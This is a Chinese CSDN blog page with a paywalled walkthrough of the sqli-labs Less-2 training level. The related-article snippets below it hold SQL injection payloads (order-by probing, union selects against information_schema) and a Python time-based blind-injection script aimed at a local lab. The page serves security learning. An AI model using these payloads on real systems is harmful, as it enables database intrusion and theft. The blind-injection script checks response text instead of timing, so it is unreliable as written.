sqli-labs Less-2解题思路

最新推荐文章于 2024-06-06 17:39:46 发布

「已注销」

最新推荐文章于 2024-06-06 17:39:46 发布

阅读量924

点赞数

分类专栏： sqli-labs 文章标签： sqli-labs 渗透攻击安全

本文链接：https://blog.youkuaiyun.com/qq_35266419/article/details/90026686

版权

本文详细介绍了如何解决sqli-labs的Less-2挑战，通过GET错误注入，逐步揭示了爆字段、数据库、表名和列名的过程，强调了渗透测试中分析错误信息和细心操作的重要性。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

首先声明一下，我自己也是一名小白，或者你可以叫我“脚本小子”。只是喜欢这个东西就去钻研，有一点心得就发布出来与大家探讨，有问题请多多指教。末尾更精彩！

Less-2 GET-Error based-intiger based

①打开页面，如图所示：

please input the ID as parameter

②[如图所示：please input the ID as parameter … ]此处id 传递参数，先测试是否存在漏洞

在这里插入图片描述

③根据返回错误页面信息 LIMIT 0,1’，多加了一个’,此处为字符型注入【注入类型有两种：字符型和数字型，将成对的引号去掉以后只有数字为数字型，如果数字后面有符号，如’,

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

「已注销」

关注关注

0
点赞
踩
3

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Sqli-Labs闯关—Less 2

weixin_39157582的博客

08-19

215

安装sqli-labs1、phpstudy安装1.1、Mysql中注释符有三种1.2、总结2、单引号1.1、1.2、新的改变功能快捷键合理的创建标题，有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能，丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1、phpstudy安装安装phpstudy2018 下

sqli-labs Less-5解题思路

qq_35266419的博客

05-12

722

从本节开始就学习盲注，思路较 Less1-4略有不同，请仔细体会 Less-5 Get-Double injection-Single Quotes - String （1）查看页面源代码通过页面源代码，什么都不显示（2）猜测数据库的长度当数据库长度正确和错误时，如上图所示 (3)现在开始猜测数据库第一位（其实盲注和前面几个的解题思路一样，只是手法稍有不同）（4）猜测数据库名称第二...

参与评论您还未登录，请先登录后发表或查看评论

Sqli-labs less 2

weixin_34175509的博客

08-11

146

Less-2 将'（单引号）添加到数字中。我们又得到了一个Mysql返回的错误，提示我们语法错误。 YouhaveanerrorinyourSQLsyntax;checkthemanualthatcorrespondstoyourMySQLserverversionfortherightsyntaxtousenear''LIMIT...

Sqli-labs之Less-2

→_→

03-12

1405

Less-2 翻译：获取-基于错误-基于整数欢迎Dhakkan 请输...

Sqli-Labs之less-2

ISNS的博客

02-05

1003

说在开头：文章是我通过查询资料后按照自己的理解总结出来的，所以如果有说法不对的地方，欢迎大佬指正~

sqli-labs Less-32、33、34、35、36、37（sqli-labs闯关指南 32、33、34、35、36、37）—宽字节注入

m0_54899775的博客

12-26

1994

sqli-labs Less-32、33、34、35、36、37（sqli-labs闯关指南 32、33、34、35、36、37）—宽字节注入

SQLi-labs-Master（1-22）新手通关宝典

Myosotis_LL的博客

05-18

3053

欢迎来到《SQLi-labs-Master新手通关宝典》，本宝典专为网络安全新手编写，旨在引导他们深入了解SQL注入（SQLi）这一严重的安全漏洞。SQL注入允许攻击者通过精心构造的输入来操纵数据库查询，从而获取、篡改或删除敏感数据。本篇将带领你从基础知识出发，逐步掌握SQL注入的原理、技术和防御策略。通过SQLi-labs等实验环境，你将有机会在真实场景中实践SQL注入攻击，并学习如何有效防御。无论你是开发人员、系统管理员、渗透测试人员还是网络安全爱好者，掌握SQL注入技术都将对你大有裨益。

《从0到1000》sqli-labs1-75关解题记录

BaiScorpio的博客

05-17

1368

sqli-lab教程Less-2

Brucye

03-23

340

less-1 sqli-lab通过各种方式（整型注入，字符注入，布尔盲注，时间盲注，堆叠注入…）爆出库表字段拿到字段值。学习sqli注入必备语句：查库：select schema_name from information_schema.schemata 查表：select table_name from information_schema.tables where table_schema=‘security’（此处拿security库为例）查字段：select column_name

sqli-labs ---- Less-2

Nixawk

05-31

1166

[地址]: https://github.com/Audi-1/sqli-labs

sqli-labs 通关教程 Less-2

一期一会的博客

12-03

936

区分类型(数字型) http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=1 http://127.0.0.1/sqlilabs/Less-2/?id=1 and 1=2 查找回显点使用二分法，确定回显点，首先试6，没反应，试3，有反应；试5，无反应，试4，无反应。可以确定回显点为3 http://127.0.0.1/sqlilabs/Less-2/?id=1 order by 3 查看存放位置 http://127.0.0.1/.

sqli-labs Less-2

万丈⾼楼平地起，勿在浮沙筑⾼台学艺不精的安全菜鸡，改行回家养猪了，对博客有疑问欢迎留言，看到一定回

03-31

253

sqli-labs Less-21.判断注入类型2.测试字段数3.使用联合查询查看页面的显示位4.爆出数据库版本和当前数据库名5.爆出所有数据库6.爆出当前数据库所有表7.查询当前数据库users表所有字段8.查询数据 1.判断注入类型 index.php?id=1*1 index.php?id=1*2 测试得知为整形注入 2.测试字段数 index.php?id=1 order by 4#...

【SQLI-Lab】-Less2

xinyue9966的博客

01-21

328

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入）前言一、GET整型(数字型)注入二、步骤总结前言一、GET整型(数字型)注入执行数据库查询，并在回显点展示。用户可以看到数据库查询出错时的错误语句，就可以观察报错语句分析出查询语句结构，从而构造特殊的payload进行注入，并从回显点中获取想要的信息。二、步骤通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-2/?id=1' 进一步查看回显 h

sqli-lab 学习记录less2

qq_43677324的博客

03-16

293

sqli-lab 学习记录less2 less2 1.我们先来判断这次的sql注入类型我们输入 ?id=1 ?id=1' 发现第一个语句返回正确但是第二个却有了报错我们因此可以判断这次的sql注入类型为数字类型 2. 之后和less1一样我们进行暴表的名字（暴表）我们输入 ?id=0 union select 1,group_concat(table_name),3 from inf...

SQLI-labs less2

weixin_45118086的博客

07-19

293

less2 GET Error based - Intiger based http://127.0.0.1/sqli-labs/Less-2/?id=1' and 1=1 http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=1 啊哈是整形注入(废话标题都已经写了探一探字段数 http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3 --+ 4就报错了所以字段数为3 然后搞一搞注入点 http://127.0.0

sqli-labs练习之 Less-2

博客地址 www.sec0nd.top

06-06

288

sql基础操作查库：select schema_name from information_schema. schemata; 查表：select table_name from information_schema.tables where table_schema=‘security’; 查列：select column_name from information_schema.columns where table_name=‘users’ 查字段：select username,password

SQLI-Labs：Less - 2（UNION 联合注入）

weixin_43320796的博客

06-06

435

联合注入（Union Injection）是一种SQL注入攻击技术，它通过在原有的SQL语句中添加UNION操作，将恶意构造的SQL语句与应用程序的SQL语句进行联合，从而对数据库进行非法操作。这种攻击方式允许攻击者获取敏感数据，或者修改、删除、插入数据。

sqli-lab教程——Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

luosaierdadi的博客

07-06

244

输入单引号，根据报错信息确定咱们输入的内容被原封不动的带入到数据库中，也可叫做数字型注入，就是，把第一题中id=1后面的单引号去掉，其它保持不变就行了。

sqli-labs less-8

最新发布

12-30

### sqli-8 解题思路 #### 1. 实验环境准备为了完成Less-8的挑战，确保已安装并配置好sqli-labs平台。此部分涉及设置Web服务器以及数据库连接等基础工作[^1]。 #### 2. SQL注入点分析在Less-8中，存在一个基于布尔条件的时间延迟型SQL注入漏洞。当输入特定参数时，应用程序会执行带有`SLEEP()`函数的查询来判断是否存在符合条件的数据记录。这种类型的注入允许攻击者通过观察页面响应时间差异推断出隐藏的信息。 #### 3. 构造有效载荷(Payload) 目标是从users表获取用户名和密码哈希值。可以利用二分法逐位猜解ASCII码形式存储的内容。例如： ```sql 1' AND IF(ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),1,1))>67,SLEEP(5),NULL) -- ``` 这段代码的作用是在第一个用户的用户名首字母大于'C'(ASCII=67)的情况下让服务器暂停五秒再返回结果；反之则立即给出回应。调整比较运算符(`>`改为 `<`) 和 ASCII 数字范围可以帮助逐步缩小可能的结果集直至完全破解所需数据。 #### 4. 自动化脚本编写手动测试效率低下且容易出错，因此建议开发Python或其他编程语言编写的自动化工具来进行批量处理。下面是一个简单的Python示例用于实现上述逻辑: ```python import requests from string import ascii_lowercase, digits url = "http://localhost/sqli/Less-8/?id=" characters = '_' + ascii_lowercase + digits def check(payload): response = requests.get(url + payload).content.decode('utf-8') return 'query took too long' in response.lower() for i in range(1, 21): # Assuming max length of username is 20 characters. found_char = False for char in characters: injection_string = f"1' AND IF(ASCII(SUBSTRING((SELECT user FROM users LIMIT 0,1),{i},1))={ord(char)},SLEEP(5),NULL)--" if check(injection_string): print(f"[+] Found character {char} at position {i}") break print("[*] Finished!") ``` 该程序遍历所有潜在的有效字符，并依次验证它们是否存在于指定位置上。一旦找到匹配项就会打印出来直到整个字符串被还原完毕。